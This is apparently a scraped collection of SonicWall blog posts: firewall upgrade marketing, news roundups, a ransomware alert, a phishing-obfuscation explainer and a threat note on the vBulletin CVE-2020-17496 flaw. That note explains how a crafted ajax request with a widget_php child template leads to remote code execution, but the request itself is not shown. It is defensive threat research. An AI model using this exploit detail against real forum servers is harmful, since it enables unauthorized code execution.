10 Reasons to Upgrade to the Latest SonicWall TZ Firewall

Some people prefer not to upgrade their products till the bitter end. In some cases, this is fine — you may be able to live with the fact that the laptop you got for college graduation a decade ago won’t run “Hitman 2” or “Metro Exodus,” as long as it’ll connect to the internet and give you a place to store all your MP3s.

But the risks of running an aging firewall extend far beyond fear of missing out: Firewalls must be updated regularly to stop advanced cyberattacks, as well as keep up with the speed, performance and productivity needs demanded by today’s workplace. Here are the top ten reasons why you should consider updating your legacy firewall to the latest SonicWall TZ Series next-generation firewall:


Stop the Most Advanced Threats

Advanced cyber threats are on the rise and affect all businesses and organizations. The cloud-based, multi-engine SonicWall Capture Advanced Threat Protection (ATP) sandbox service provides high security effectiveness against advanced persistent threats and new attacks, including ‘never-before-seen’ ransomware, malware and side-channel attacks. Capture ATP subscribers discover and stop over 1,000 new attacks each business day.

Why upgrade: SonicWall Capture ATP is only available for SOHO 250, TZ350, TZ400 and above firewalls, as well as the NSa and NSsp line. This service is not available for legacy firewalls, including TZ105, TZ205 and TZ215 firewalls.


Inspect More Encrypted Traffic without Slowing Performance

Never be forced to choose between performance and security. With the increased network bandwidth requirements from today’s SaaS apps, video streaming and social media, firewalls with faster deep packet inspection (DPI) offer better network security without performance degradation.

During the first half of 2020, 1 in 12 SonicWall customers with DPI-SSL activated saw malware on encrypted traffic. And the numbers are on the rise: In June, SonicWall recorded 378,736 of these attacks—more than at any other point in 2020 or the last half of 2019.

Simply put, faster DPI performance provides organizations with a greater capacity to utilize higher internet speeds and support more concurrent users — all without sacrificing security.

Why upgrade:  SonicWall TZ350 and TZ400 firewalls offer significantly faster DPI performance than the TZ 105 (up to 24x), TZ 205 (up to 15x) and TZ 215 (up to 10x).


Inspect Encrypted Traffic without Increasing Costs

The vast majority of web traffic is now encrypted. And without the proper security controls in place, traffic encrypted by TLS/SSL standards provides cybercriminals a backdoor to your network.

That’s why deep packet inspection of encrypted traffic (DPI for TLS/SSL) is mandatory for businesses of all sizes. Unfortunately, some firewall vendors upcharge you for proper TLS/SSL inspection capabilities (or don’t offer it at all).

Why upgrade: SonicWall TZ350 and TZ400 firewalls include the DPI-SSL license (by default) to inspect encrypted traffic at no additional cost, thereby reducing capital expense. Unfortunately, the TZ105, TZ205 and TZ215 do not support inspection of encrypted traffic.


Upgrade Your TZ Firewall

Ready to upgrade to the newest SonicWall TZ firewall? Take advantage of the SonicWall Secure Upgrade Plus program to save money when you replace your existing SonicWall firewall or other eligible security appliance.


Secure Growing Remote Workforce

With today’s remote workforce far larger than ever before, companies need the ability to provide employees with secure access to data — anytime and anywhere. A larger number of secure VPN connections is essential to support the increasing number of remote users. But based on the firewall(s) you have deployed, you may have a limit on how many remote employees you can protect at a single time.

Why upgrade: The latest SonicWall TZ400 firewall supports 10 times the number of SSL-VPN clients as the TZ 205 and TZ 215 (100 vs. 10). The TZ350 firewall enables 7.5 times as many SSL-VPN clients as the TZ 205 and TZ 215 (75 vs. 10). The latest SonicWall TZ400 firewall supports 10 times the number of SSL-VPN clients as the TZ 205 and TZ 215 (100 vs. 10). The TZ350 firewall enables 7.5 times as many SSL-VPN clients as the TZ 205 and TZ 215 (75 vs. 10).


Support Faster Wi-Fi Speeds

The world is wireless. Wi-Fi speeds — and users’ appetite for connectivity — are increasing exponentially. The 802.11ac wireless standard delivers the performance, range and reliability of high-speed wireless technology for an enhanced user experience. But in a properly secured environment, they must be paired with a firewall that can support 802.11ac wireless standards.

Why upgrade: The SonicWall TZ350 and TZ400 firewalls support the 802.11ac wireless standard as well as SonicWave 802.11ac Wave 2 access points for high-speed wireless networking. Unfortunately, the legacy TZ105, TZ205 and TZ215 firewalls only support the slower legacy 802.11n wireless standard, and do not work with the latest SonicWave wireless access points.


Reduce Support Costs

Single sign-on (SSO) technology helps improves employee productivity and reduce IT support costs by enabling users to safely gain access to connected systems with a single ID and password. Simply, the more users can access with a single ID, the fewer support calls, IT tickets and complaints will be generated. This equals real savings to your organization.

Why upgrade:

The SonicWall TZ350 and TZ400 firewalls enable twice the population of users (500 vs. 250) to benefit from the use of single sign-on.


Protect More Concurrent Users

There should rarely be a limit on how many users you are able to protect. A higher number of concurrent connections provides greater scalability by enabling more simultaneous user sessions to be active and protected by the firewall.

Why upgrade: The newest SonicWall TZ350 and TZ400 firewalls enable a much larger number of concurrent connections per second, plus deep packet inspection of TLS/SSL-encrypted connections, compared to the TZ105, TZ205 and TZ215.


Increase Speed to Keep Pace with Threat Processing

Modern cybersecurity requires firewalls that can manage network traffic more quickly to deliver the high performance needed for modern-day threat processing. Legacy firewalls can’t process as much traffic volume, sometimes hindering performance and efficiency. This can result in businesses being unable to achieve their promised internet speeds.

Why upgrade: The SonicWall TZ400 firewall, for example, has double the number of security processors as the TZ205 and TZ215 (4 vs. 2). In addition, TZ350 and TZ400 have higher speed processors (1.2 GHz and 800 MHz, respectively), compared with 400/500 MHz processors in the previous TZ205 and TZ215 firewalls. These speed boosts keep your business humming and safe from modern threats.


Boost Memory for Added Users, Logs & Policies

The number of users who require security on your network grows by the day. Unfortunately, the on-board memory of legacy firewalls can only support a finite footprint of users on the network. Advanced firewalls offer more onboard memory to allow for more rules and policies, users, and log messages to be stored on the firewall, making reporting easily accessible.

Why upgrade: The SonicWall TZ350 and TZ400 firewalls have up to four times the onboard memory of the TZ205 and TZ215 (1 GB vs. 256 MB/512 MB). This increased capacity empowers organizations to use a single TZ firewall to protect a larger userbase with deeper and more robust rules and policies.


Boost Performance, Security with Additional VLANs

Creating a greater number of virtual local area networks (VLAN) enables organizations to segment users and devices into additional groups, improving performance and security while reducing hardware costs. The ability to scale these VLANs depends on a number of factors, most notably how many may be protected by a firewall.

Why upgrade: The SonicWall TZ400 firewall provides the ability to create up to five times the number of VLANs as the TZ 205 and TZ 215 (50 vs. 10/20). The TZ350 firewall enables the creation of 2.5 times more VLANs than the TZ 205 (25 vs. 10).


About SonicWall TZ Next-Generation Firewalls

Get high-speed threat prevention in a flexible, integrated security solution with the SonicWall TZ Series. Designed for small networks and distributed enterprises with remote and branch locations, SonicWall TZ next-generation firewalls offer five different models that can be tuned to meet your specific needs.

FeatureTZ105/WTZ205/WTZ215/WTZ300/WTZ400/W
Memory (RAM)32/256 MB32/256 MB32/512 MB1 GB1 GB
DPI performance25 Mbps40 Mbps60 Mbps100 Mbps300 Mbps
Maximum connections
     per Second1,000/sec1,500/sec1,800/sec5,000/sec6,000/sec
     SPI8,00012,00048,00050,000100,000
     DPI8,00012,00032,00050,00090,000
     DPI SSL500500
SSL VPN licenses (max.)1 (10)1 (15)2 (10)1 (50)(100)
Wireless standards802.11n802.11 a/b/g/n802.11 a/b/g/n802.11 a/b/g/n/ac802.11 a/b/g/n/ac
SSO users150250250500500
VLAN interfaces51020250
DPI SSL licenses includedYesYes
Capture Advanced Threat Protection (ATP) sandbox serviceYesYes

Advanced networking and management features, such as Secure SD-WAN and Zero-Touch Deployment, make it easy to bring up new sites as you need. Adding optional capabilities, such as PoE/PoE+ support and 802.11ac Wi-Fi, helps create a unified security solution that protects your network and data from the latest threats over wired and wireless connections.

Ready to upgrade to the newest SonicWall TZ firewall? Take advantage of the SonicWall Secure Upgrade Plus program to save money when you replace your existing SonicWall firewall or other eligible security appliance.

10 Reasons to Upgrade to the Latest SonicWall NSa Firewall

There are some things that are with you for life: Leather workboots on their fifth resole, your grandpa’s fishing vest, a thermos from scout camp that’s still going strong decades later. But when it comes to protection, staying current matters.

If you wouldn’t trust a 15-year-old tube of sunscreen to protect your skin, and you wouldn’t put your child in the carseat your mother saved from when you were a kid, why would you trust a legacy firewall to protect your network?

If you’re still running an older SonicWall NSA or E Series model, here are 10 reasons you should consider upgrading to the latest mid-range SonicWall NSa next-generation firewall.

Stop the Most Advanced Threats

Advanced persistent threats move with great speed and tenacity, and are designed to target and infiltrate all businesses and organizations.

However, a cloud-based, multi-engine sandbox, such as the SonicWall Capture Advanced Threat Protection (ATP) service, provides real-time security against advanced cyberattacks, including ‘never-before-seen’ ransomware, malware and side-channel attacks. Capture ATP subscribers discover and stop more than 1,000 new attacks each business day.

Why upgrade: SonicWall Capture ATP is only available for the NSA/NSa 2600 and newer next-generation firewalls, as well as the current TZ and NSsp product lines (sixth generation or newer). This service is not available for legacy SonicWall firewalls, including some NSA and E Series models (usually silver in color with the old blue SonicWall logo).


Inspect Traffic without Slowing Performance

You should never be put into a position to choose between security and performance. With bandwidth-hungry apps woven into our everyday lives — SaaS apps, video streaming and social media — firewalls with faster deep packet inspection (DPI) are better at securing networks without greatly affecting performance.

During the first half of 2020, 1 in 12 SonicWall customers with DPI-SSL turned on saw malware on encrypted traffic. And the numbers are on the rise: In June, SonicWall recorded 378,736 of these attacks—more than at any other point in 2020 or the last half of 2019.

Faster DPI performance gives businesses greater capacity to utilize higher internet speeds and support more concurrent users without ever sacrificing security.

Why upgrade:  For example, NSa 2650 delivers a 25% DPI-SSL performance improvement over the NSA 2600. SonicWall NSa 2650 and newer firewalls (e.g., 2650-9650) offer significantly faster DPI performance than their predecessors, the NSA 2600-9600 range, E Series models and other older appliances.


Inspect TLS/SSL Traffic without Increasing Costs

The majority of web traffic is encrypted today. Without proper security controls in place, TLS/SSL encryption standards provide cybercriminals easy access to your network.

That’s why deep packet inspection of encrypted traffic (DPI for TLS/SSL) is mandatory. Some firewall vendors, unfortunately, upcharge for proper TLS/SSL inspection capabilities or simply don’t offer the capability at all. Unfortunately, inspecting TLS/SSL traffic also takes compute power, and organizations need a firewall that can process TLS-encrypted traffic without hurting performance.

Why upgrade: The latest SonicWall NSa firewalls include the DPI-SSL license (by default) to inspect encrypted traffic at no additional cost, thereby reducing capital expense. Unfortunately, older-generation NSA firewalls (usually silver in color with our old logo) do not support inspection of encrypted traffic.

Upgrade Your NSa Firewall

Ready to upgrade to the newest SonicWall NSa firewall? Take advantage of the SonicWall Secure Upgrade Plus program to save money when you replace your existing SonicWall firewall or other eligible security appliance.


Expand Remote Branch/Site Security

For organizations with remote and branch locations, such as retail POS businesses, schools, banks and more, the ability to create a larger number of site-to-site VPN tunnels to connect distributed networks together and securely share data is essential. But not all firewalls have the capability or capability to make this happen.

Why upgrade: By moving to the latest NSa Series firewall, your organization can secure more remote branches, services and devices. This is particularly powerful for distributed enterprises, retail organizations, etc. The NSa 2650, for example, enables the creation of 4x more site-to-site VPN tunnels than the NSA 2600 (1,000 vs. 250).


Support More High-Speed Wi-Fi Connections

Fast and secure Wi-Fi is a requirement in today’s hyper-connect world. Today’s wireless standard, 802.11ac, delivers the performance, range and reliability of high-speed wireless technology for a safe and fast user experience.

In a properly secured environment, wireless access points must be paired with a firewall that can support 802.11ac wireless standards.

Why upgrade: Newer firewalls can support more connections. The option to connect a larger number of wireless access points to a single firewall enables organizations to extend their wireless network farther without purchasing additional hardware.

Combine the latest NSa Series next-generation firewall with a SonicWall SonicWave 802.11ac Wave 2 wireless access point to create a high-speed wireless network security solution.

NSa Series firewalls and SonicWave 400 Series wireless access points both feature 2.5 gigabit Ethernet ports that can support multi-gigabit wireless throughput, which is available in the 802.11ac Wave 2 wireless standard. In addition, you can connect more wireless access points to the latest NSa firewall. The NSa 2650, for example, supports 1.5x the number of connected SonicWave wireless access points as the NSA 2600 (48 vs. 32).

Unfortunately, legacy NSA and older firewalls (as well as those on SonicOS 5.x or older firmware) do not offer multi-gigabit ports to accommodate the faster throughput supported by Wave 2 wireless standard.


Decrease Support Costs

Single sign-on (SSO) technology helps secure your environment, as well as employees, to be more productive and helps shrink IT support costs (e.g., tickets, calls, etc.) by enabling users to safely gain access to connected systems with a single ID and password.

Simply, the more users who can access a system with a single ID, the fewer support calls, IT tickets and complaints that will be generated. This self-service approach means real savings to your business or enterprise.

Why upgrade: The NSa 2650, for example, allows a larger population of users (40,000 vs. 30,000) to benefit from the use of SSO compared to the legacy NSA 2600. This disparity widens the further you go up the product line.


Increase Network Capacity

With increased network bandwidth requirements from apps, video streaming and social media, faster DPI and DPI-SSL performance provides a secure network without performance degradation.

Faster DPI performance also provides organizations with a greater capacity to utilize higher internet speeds and support more concurrent users. A higher number of concurrent connections provides greater scalability by enabling more simultaneous user sessions to be active and protected by the firewall.

Why upgrade: The NSa 2650 enables 500,000 deep packet inspection (DPI) connections and up to 100,000 deep packet inspection of TLS/SSL-encrypted (DPI-SSL) connections compared to the 250,000 for DPI and 1,000 for DPI-SSL on the NSA 2600 and older models, such as the NSA 220 (32,000 for DPI).


Boost Memory for Added Users, Logs & Policies

The number of users who require security on your network grows by the day. Unfortunately, the on-board memory of legacy firewalls can only support a finite footprint of users on the network.

Advanced NSa firewalls offer more onboard memory to allow for more rules and policies, users, and log messages to be stored on the firewall, making reporting easily accessible.

Why upgrade: The NSa 2650 has twice the onboard memory of the NSA 2600 (4 GB vs. 2 GB) and eight times the memory of the NSA 220 (4 GB vs. 512MB). This increased capacity empowers organizations to use a single NSa firewall to protect a larger userbase with deeper and more robust rules and policies.


Many Ports in a Storm

It’s time to clean up your server room or IT area. Having a greater number of ports allows organizations to connect more SonicWall devices directly to the firewall without needing to purchase a switch. In addition, organizations that require increased throughput to support bandwidth-intensive applications and data transfer need multi-gigabit ports.

Why upgrade: Newer NSa firewalls offer many more ports than their predecessors. For example, the NSa 2650 has 2.5x the number of ports as the NSA 2600 (20 vs. 8). The NSa 2650 also features eight 2.5 GbE ports while the NSA 2600 has none.


Improve Business Continuity

Many enterprises and larger organizations build businesses continuity and disaster recovery plans into their process. Part of this planning is ensuring there’s a contingency for as many scenarios as possible, not the least of which is power. Many legacy firewalls only offer a single power supply. Newer models offer a second power supply to ensure business continuity if one power supply fails.

Why upgrade: While the current NSa line and last-generation NSa Series both include a single power supply, the NSa 2650-9650 have an additional slot to add an optional second power supply for critical redundancy.


About SonicWall NSa Next-Generation Firewalls

The SonicWall Network Security appliance (NSa) Series mid-Range firewalls consolidate automated advanced threat prevention technologies in a mid-range next-generation firewall platform.

Built on a multi-core hardware architecture featuring 10-GbE and 2.5-GbE interfaces, the NSa Series scales to meet the performance demands of mid-size networks, branch offices and distributed enterprises. NSa Series firewalls feature cloud-based and on-box capabilities such as TLS/SSL decryption and inspection, application intelligence and control, Secure SD-WAN, real-time visualization and WLAN management.

For a closer look at the NSa range of firewalls, explore the specifications table below or download the complete SonicWall NSa data sheet.

UPGRADE YOUR NSA FIREWALL

Ready to upgrade to the newest SonicWall NSa firewall? Take advantage of the SonicWall Secure Upgrade Plus program to save money when you replace your existing SonicWall firewall or other eligible security appliance.

Built on a multi-core hardware architecture featuring 10-GbE and 2.5-GbE interfaces, the NSa series scales to meet the performance demands of mid-sized networks, branch offices and distributed enterprises. NSa series firewalls feature cloud-based and on-box capabilities such as TLS/SSL decryption and inspection, application intelligence and control, Secure SD-WAN, real-time visualization and WLAN management.

SonicWall’s Jason Carter Recognized as One of CRN’s ‘100 People You Don’t Know But Should’

As COVID-related issues plague 2020, some individuals rose to meet these new challenges head-on, helping channel partners eager to address customer needs in what would become the ‘new business norm.’

One of them — SonicWall Vice President, Global Inside Sales and Installed Base Programs Jason Carter — has been named one of the CRN’s 100 People You Don’t Know But Should for 2020.

“This year has certainly had its hurdles, but it’s been amazing to be part of a concerted industry effort that provides the security solutions newly distributed networks desperately need,” said Carter. “I look forward to collaborating with existing partners, new recruits and distributors to solve new challenges as organizations face unprecedented, pervasive attacks.”

Based on feedback from leading solution providers and industry executives, the CRN editorial team uses the 100 People You Don’t Know But Should list to draw attention to those outstanding channel players who may not be household names, but still work tirelessly to keep their partners thriving and the IT channel growing.

“Managing a successful channel partner program today calls for a small army of people, but only a few Channel Chiefs tend to enjoy widespread recognition,” said Blaine Raddon, CEO of The Channel Company. “With the 100 People You Don’t Know But Should, we are delighted to shine a spotlight on an exceptional group of unsung team members, giving them some of the acclaim they deserve for their indispensable contributions to channel success.”

Jason works as part of the SonicWall SecureFirst partner program, which consists of over 20,000 channel partners worldwide. The program provides real-time cyber-threat intelligence; education on current and emerging threats and the SonicWall solutions designed to address them; and an accreditation and certification capability that significantly accelerates our partner’s effectiveness and success. Since its inception, the program has administered 668,303 successful exams and more than 334,152 hours of training.

CVE-2020-17496 – vBulletin RCE vulnerability actively being exploited in the wild

SonicWall Capture Labs Threat Research team observes attackers actively exploiting the recent remote code execution vulnerability reported in vBulletin. VBulletin is a popular forum software used by about 20,000 websites. It is written in PHP and uses the MySQL database. 

CVE-2020-17496 | Vulnerability:

A remote code execution vulnerability has been reported in vBulletin. This vulnerability is due to improper validation of subWidgets data in an ajax/render/widget_tabbedcontainer_tab_panel request. It is a bypass for CVE-2019-16759, a critical pre-authentication vulnerability in vBulletin that was disclosed in September 2019. When an attacker sends a crafted ajax request that contains the template name widget_php with malicious code placed in the parameter widgetConfig[‘code’], the render engine will execute the malicious code in the request. It was fixed by checking the name, If the name is widget_php, the engine won’t render the requested template. That made widget_php the only template that could be utilized for PHP code execution. In the latest bypass, the tabbedcontainer_tab_panel template widget is found to be capable of loading “a user-controlled child template, effectively bypassing the patch for CVE-2019-16759.

Exploit:

In the below post request, the child template name is widget_php and the malicious code can be passed through subWidget elements allowing remote code execution.

 

 

A remote, unauthenticated attacker could exploit this vulnerability by sending the above crafted request to the vulnerable server. Successful exploitation could result in remote code execution.

Trend Chart:

SonicWall Capture Labs Threat Research team provides protection against this exploit with the following signatures:

IPS: 15163 vBulletin widget_tabbedContainer_tab_panel Remote Command Execution

Affected Products:

All versions of vBulletin prior to the 5.6.x are affected by this vulnerability. Users should migrate over to a patched version as soon as possible.

Zhen ransomware actively spreading in the wild

The SonicWall Capture Labs threat research team observed reports of a new variant family of Zhen ransomware [Zhen.RSM] actively spreading in the wild.

The Zhen ransomware encrypts the victim’s files with a strong encryption algorithm until the victim pays a fee to get them back.

Infection Cycle:

The ransomware adds the following files to the system:

  • Malware.exe
    • %App.path%\ [Name]. < . Zhen >
    • %App.path%\ payment request.txt > recovery instruction

Once the computer is compromised, the ransomware runs the following commands:  (Actual Source code)

When encrypting files it will use the AES encryption algorithm and only encrypt those files that match the following extensions:

The ransomware encrypts all the files and appends the [Zhen] extension onto each encrypted file’s filename.

After encrypting all personal documents, the ransomware shows the following picture containing a message reporting that the computer has been encrypted and to contact its developer for unlock instructions.

We have been monitoring varying hits over the past few days for the signature that blocks this threat:

SonicWall Capture Labs threat research team provides protection against this threat via the following signatures:

  • GAV: ZHEN.RSM (Trojan)

This threat is also detected by SonicWall Capture ATP w/RTDMI and the Capture Client endpoint solutions.

Cybersecurity News & Trends – 09-25-20

This week, foreign hackers made headlines for targeting everything from COVID-19 research, to NASA, to the U.S. presidential election.


SonicWall in the News

Top 5 CyberSecurity Innovations and Why They’re Drawing In The Money — TechGenix

  • SonicWall’s product with Perimeter 81 was in included in article, as an innovation in the zero-trust sector.

ChannelPro Weekly Podcast: Episode #157 – The New M&A (Mongrels & Animals) — ChannelPro Weekly

  • In its weekly news podcast, ChannelPro Network discussed SonicWall’s 7th generation of security products.

Coronavirus Puts Security At The Heart Of The Agenda — MicroScope

  • Terry Greer-King, vice-president for EMEA at SonicWall, says the “mass shift” from working within the corporate perimeter to working from home has made everyone inherently less secure, ushering in an era of “boundless cyber security”

Making Work-From-Home Security Work — ChannelPro Network

  • In an article about how to successfully and securely work from home, SonicWall’s data on the increase in ransomware from the midyear update to the 2020 Cyber Threat Report is included to showcase the dangers of ransomware attacks.

Industry News

U.S. warns ‘foreign actors’ aim to sow doubts over mail-in voting — Reuters

  • U.S. federal law enforcement and cybersecurity agencies on Tuesday warned that “foreign actors” will likely try to discredit the November presidential election by taking advantage of the slow counting of mail-in ballots.

UK Govt Advisor Warns: Universities the Latest Frontier for Cybercriminals — IT Supply Chain

  • Students’ return to universities has coincided with a spate of attacks against academic institutions across the North of England, prompting the National Cyber Security Centre to issue a warning: Prepare for disruption as the term starts.

FBI Open China-Related Counterintelligence Case Every 10 Hours — SC Media

  • FBI Director Christopher Wray offered the House Homeland Security Committee some sobering news about China: the FBI opens a new China-related counterintelligence case roughly every 10 hours.

Ransomware gang targets Russian businesses in rare coordinated attacks — ZDNet

  • Group breaks an unofficial rule in the cybercrime underground not to target the former Soviet space.

Lessons from the ransomware death: Prioritize cyber emergency preparedness — SC Magazine

  • The death of a woman, at least in part due to a ransomware attack, has placed security teams on high alert.

“LokiBot,” the malware that steals your most sensitive data, is on the rise — Ars Technica

  • Officials are seeing a big uptick in infections coming from LokiBot, an open-source DIY malware package that’s openly sold or traded in underground forums. It steals passwords and cryptocurrency wallets, and can also download and install new malware.

The dark web won’t hide you anymore, police warn crooks — ZDNet

  • ‘Operation Disruptor’ involved agencies from nine countries and resulted in the seizure of over $6.5m in cash and cryptocurrencies, as criminals are warned law enforcement will track them down.

Healthcare lags behind in critical vulnerability management, banks hold their ground — ZDNet

  • New research sheds light on which industries are performing well when it comes to patching high-risk bugs.

Officials say NASA facing increased targeting by foreign and domestic hackers — The Hill

  • Top officials at NASA say the agency is facing increasing attempts by foreign hackers to target sensitive information as it works to improve its IT security during the COVID-19 pandemic.

FBI sounds alarm on rampant personal-data theft by China-backed hackers — The Washington Times

  • China is engaged in massive data mining in the U.S. and likely has stolen personal information on nearly half of the entire U.S. population, FBI Director Christopher Wray revealed.

Chinese and Russian hackers pose ‘very, very real threat’ to COVID-19 research: FBI Director Wray — The Washington Times

  • Foreign hackers searching for ways to steal coronavirus research remain a “very, very real cyber threat,” FBI Director Christopher A. Wray told the House Homeland Security Committee.

U.K. warns of surge in ransomware threats against education sector — Bleeping Computer

  • The U.K. National Cyber Security Centre has issued an alert about a surge in ransomware targeting educational institutions, urging them to follow new recommendations for mitigating attacks.

In Case You Missed It

Advanced Threats: Am I At Risk?

In “The Art of War,” Sun Tzu said, “If you know the enemy and know yourself, you need not fear the result of a hundred battles … if you know neither the enemy nor yourself, you will succumb in every battle.”

While he couldn’t have foreseen the digital salvos of two thousand years hence, his words ring as true for today’s cybersecurity arms race as they did for ancient Chinese military strategy. And now that the COVID-19 pandemic has ushered in a future where everyone is remote, everyone is mobile and everyone is less secure, cybercriminals are redoubling their efforts and specifically targeting remote workers — making it more important than ever to know what you’re up against.

Unfortunately, when it comes to cybercrime, it’s often much harder to know who your enemy is, where they’re located, or what weaponry they’re bringing to bear. Worse, in some cases you may not know until much later that you’ve even been attacked at all. We’ve seen cyberthreats evolve from basic computer viruses to widespread and devastating attacks such as Stuxnet, WannaCry, NotPetya, Spectra and more. But exactly how advanced and prevalent are today’s attacks?

According to the midyear update to the 2020 SonicWall Cyber Threat Report, while the quantity of malware deployed overall is dropping, the malware that is going out is both more advanced and more targeted than ever before. The degree of sophistication displayed in some phishing and social engineering strategies proves that even if you don’t know your adversary, they certainly know you — and if they’re successful in fooling you, their weapons of choice are often capable of completely circumventing legacy cybersecurity solutions.

These sorts of threats will often obfuscate in front of security solutions, only to execute later when in memory — or worse, in the CPU and hardware where you are a tenant, perhaps in a service you have in the cloud where the hardware itself executes the code and steals your information.

And if you’re thinking only a handful of cybercriminals have access to this level of sophistication, think again.

So far in 2020, every month has seen a significant year-over-year increase in the number of malware variants found by SonicWall Capture ATP (Advanced Threat Protection) and RTDMI (Real-time Deep Memory Inspection) — combined, they represent a full 62 percent increase over 2019’s first-half totals. In the first six months of 2020, Capture ATP and RTDMI found 315,395 new malware variants, including threats that do not exhibit any malicious behavior and hide their weaponry via encryption.

During this time, there has also been a whopping 176 percent increase in the number of malicious Office files, including some that can evade signature based anti-malware engines and hinder sandbox debugging and analysis. These files look just like any other file you may receive through the course of your workday, but can lead to data exfiltration, ransomware infections and more.

With the time between an attack’s proof of concept and threat researchers spotting the attack in the wild narrowing to just hours — and with attackers developing ways to create hundreds of variations on an attack faster than they can be identified and patched — it’s tempting to concede defeat.

Fortunately, however, it’s still possible to thwart a majority of cyberthreats, if you deploy the correct countermeasures. Join SonicWall cybersecurity expert Simon Wikberg as he explores today’s biggest threats and why they succeed in our upcoming webinar, “A Step Ahead: Future-proofing Against Tomorrow’s Attacks.

He’ll tackle the “know yourself” side of the equation by offering ways to determine your risk and profile your existing cybersecurity strategy.

And by sharing data from the SonicWall 2020 Mid-Year Cyber Threat Report, he’ll also help you become better acquainted with your adversaries, by revealing the places cybercriminals are targeting, spotlighting the techniques they’re using, and offering clues as to what they may be doing next.

By learning their tactics, you’ll be better able to create a plan, deploy proper countermeasures, and significantly decrease your risk of compromise in the next hundred battles — and beyond.

Click here to register for the webinar.

SiteCloak Page Obfuscation Techniques Leading to Greater Number of Missed Phishing Attacks

Ever since COVID-19 began closing offices and largely restricting people to their homes, cyber adversaries have been having a field day using the pandemic as a launchpad for phishing attacks. Organizations and individuals must be aware of the detective, preventive and protective measures required to safeguard their information assets against these attacks. We have seen a rise in the number of phishing attacks that bypass Office 365 due to the attackers’ use of obfuscation techniques on the credential harvesting website.

These SiteCloak methods bypass Microsoft’s real-time URL-filtering scanners by obfuscating the credential-harvesting page. This behavior is widespread, using a variety of techniques from multiple threat actors.

Attack Summary Overview:

Platform: Microsoft 365 Email

Email Security: Exchange Online Protection and Microsoft Advanced Threat Protection

Targets: All organizations, all sizes

Payload: Malicious Link

Technique: Obfuscation of Credential Harvesting Page

What is a SiteCloak attack?

To identify a malicious URL within an email, Microsoft will follow a link to scan the target page for potential malware or phishing behavior. To combat this, attackers are hiding the intent of the target page by using a variety of obfuscation techniques. This behavior is widespread and utilizes a variety of methods, some more sophisticated than others, borrowed from multiple threat actors. Most of these methods are capable of fooling Microsoft’s scanners.

In most cases, the target page turns out to be a credential harvesting site, but because these techniques are now in widespread use by several organizations, they are independent of the purpose of the page. If the user is not vigilant and provides their credentials, the user account is compromised.

Why are SiteCloak methods effective?

  • Concealed Page Intent: Microsoft URL filters are unable to determine the intent of an obfuscated page, so a malicious email is allowed to reach the user inbox.
  • Multiple Vulnerabilities: While categorized as a single method, attackers are using a variety of obfuscation techniques, meaning there is no single vulnerability to close. Even simple techniques are successful today, but while these are eventually caught, more advanced methods continue to remain effective.
  • Multiple Actors: Page obfuscation is now in use by multiple actors. The techniques are typical of email obfuscation, and many of them are old, so there is no direct link between a threat actor and their methodology.

What can you do?

  • Use a Password Manager: The best defense against most credential harvesting attacks is the use of a password manager. Most are free, and none can be fooled into entering a password into a malicious site, no matter how authentic it seems. You should never actually know your password.
  • Enable Multi-factor Authentication: MFA renders a username/password pair useless to an attacker.

Attack examples

These techniques are in use by a large number of threat organizations, so their methods vary widely.

  • Basic SiteCloak Obfuscation: ZeroFont
    In the simplest version of the attack, the credential harvesting page uses the same ZeroFont technique that was once a popular method to bypass Microsoft’s email scanners. Even old techniques can successfully fool the website scanner.
  • Advanced SiteCloak Obfuscation: JavaScript EncodingIn more advanced methods, the webpage is encoded using multiple layers of JavaScript obfuscation.
    The “unescaped” command is another JavaScript function that reads the ‘html_encoder_data’ to render the malicious web page.

    The rendered page is fairly advanced in that it does not ask the user to enter their email address, as it is encoded in the URL. It also asks for the password twice before redirecting the user to a real outlook.com page. Not only does this error-check the password for the attackers, but it also leaves the user the user with no hint that they entered their password on a fake site.

How SonicWall Can Help

SonicWall Cloud App Security can identify SiteCloak-obfuscated websites, because the web-rendering and scanning engines utilize the same indicators of attack discovered by the email-rendering and scanning filters. With CAS Protection enabled, the attacks are prevented from ever reaching your inbox, making email more secure and reliable.

To learn more about SonicWall Cloud App Security, click here.

Cybersecurity News & Trends – 09-18-20

Between legislation to protect government IoT devices, developments in the TikTok saga and Supreme Court arguments, what’s happening at the federal level this week could have far-reaching implications for cybersecurity.


SonicWall in the News

Politics in the Technology World Order — Verdict Magazine
SonicWall President and CEO Bill Conner weighs in on the future of the U.S. data privacy landscape.

Perimeter 81 Looks To Take Firewall Appliances Out — Security Boulevard
SonicWall, an investor in Perimeter 81’s recent funding round, has partnered with the firm on its firewall-as-a-service software.

Sectigo to Be Acquired by GI Partners — Sectigo Press Release
In a comment about the acquisition, SonicWall President, CEO and Sectigo Board Chairman Bill Conner said, “The future is bright for Sectigo as the company builds on its impressive position as a digital identity and web security solutions leader.”


Industry News

This security awareness training email is actually a phishing scam — Bleeping Computer
A creative phishing campaign spoofs a well-known security company in an email pretending to be a reminder to complete security awareness training.

Oracle-TikTok Deal to Undergo U.S. Security Review — The Wall Street Journal
The Treasury Department said it would review an agreement for Oracle and others to revamp TikTok’s U.S. operations, with the aim of avoiding a ban of the popular video-sharing app.

House approves bill to secure internet-connected federal devices against cyber threats — The Hill
The Internet of Things (IoT) Cybersecurity Improvement Act, passed unanimously by the House, would require all internet-connected devices purchased by the federal government to comply with minimum security recommendations.

Hackers are getting more hands-on with their attacks. That’s not a good sign — ZDNet
Both nation-state-backed hackers and cybercriminals are trying to take advantage of the rise in remote working — and getting more sophisticated in their approach.

LockBit ransomware launches data leak site to double-extort victims — Bleeping Computer
The LockBit ransomware gang has launched a new data leak site to be used as part of their double extortion strategy to scare victims into paying a ransom.

Zerologon attack lets hackers take over enterprise networks — ZDNet
If you’re managing enterprise Windows servers, don’t skip on the August 2020 Patch.

Security researchers slam Voatz brief to the Supreme Court on anti-hacking law — Cyberscoop
The Supreme Court is about to take up a case with major implications for computer research — and a group of high-profile cybersecurity specialists doesn’t want mobile voting firm Voatz to have the last word.

Don’t pay the ransom, mate. Don’t even fix a price, say Australia’s cyber security bods — The Register
Over the past 12 months, the Australian Cyber Security Centre has observed real-world impacts of ransomware incidents, which have typically originated from a user executing a file received as part of a spearphishing campaign.

Russian Intelligence Hackers Are Back, Microsoft Warns, Aiming at Officials of Both Parties — The New York Times
China is also growing more adept at targeting campaign workers, with Beijing mostly aiming at Biden campaign officials.

Iran Says US Vote Hack Allegation ‘Absurd’ — Security Week
Tehran on Friday hit back at allegations by Microsoft that Iran-based hackers had targeted the U.S. presidential campaigns.

Treasury Dept. sanctions Russian, Ukrainian individuals for election interference — The Hill
